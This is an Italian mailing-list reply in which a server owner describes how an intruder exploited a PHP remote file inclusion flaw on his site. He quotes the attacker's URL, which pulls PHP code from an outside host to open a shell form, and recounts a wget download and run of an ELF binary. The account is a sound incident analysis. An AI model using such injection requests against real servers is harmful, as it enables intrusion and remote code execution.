Marco Buffa wrote:
Ti accontento subito molto volentieri, anche se non credo che sia possibile incappare facilmente in tale ingenuità.Ciao! Maurizio Manetti wrote:Comunque ho capito cosa fa il programma che il cracker è riuscito a lanciare sul mio malcapitato serverino, grazie a una splendida pagina php da me realizzata con un colpo di genio degno di Forrest Gump :)Potresti essere piu' preciso, per favore? Magari anche in privato, se rischi di andare molto fuori tema.
La pagina vulnerabile includeva (come si usa fare comunemente in php) file esterni, il cui percorso veniva passato, per comodità come parametro in querystring. Questo è stato precisamente il punto dolente che ha permesso al cracker di entrare.
Avevo previsto, per sicurezza, di limitare l'uso di file php da includere ad una certa cartella del filesystem, ma non avevo previsto che potessero essere inclusi anche file esterni scaricati dalla pagina tramite http. La chiamata della pagina vulnerabile da parte del cracker appare in questo modo:
http://miosito/miapagina.php?module=http://madcru.tripod.com/2Questo ha consentito al cracker di far eseguire all'interno della mia pagina il codice PHP reperibile all'indirizzo http://madcru.tripod.com/2.php ospitato sui server di Tripod, celebre sito di hosting gratuito (adesso rimosso dai gestori di Tripod per ovvi motivi). In questa piccola ma efficace pagina era presente il codice sufficiente a presentare una form (all'interno del mio sito) attraverso la quale potevano essere eseguiti comandi di shell arbitrari. È stata usata la funzione system del PHP. Ovviamente tali comandi venivano eseguiti con i permessi dell'utente non privilegiato www-data. Ma ciò è stato sufficiente.
Il cracker ha effettuato tre soli comandi, e gli sono bastati.Con il primo ha scaricato via http, tramite wget, un file reperibile su un sito britannico compromesso, probabilmente dallo stesso cracker, di cui ho provveduto ad avvertire i gestori. Tale file è stato scaricato con il nome di a.out in /tmp. Si tratta dell'ELF binary di cui ho cercato di scoprire le caratteristiche. La seconda chiamata della pagina è probabilmente servita al cracker texano per eseguire il programma scaricato.
Con la terza sembra aver riavviato il web server Apache.Ma ovviamente ad ogni chiamata potrebbero essere stati eseguiti più comandi. I contenuti delle richieste di tipo POST purtroppo non vengono loggati, né so ancora se sia possibile configurare Apache per loggarli.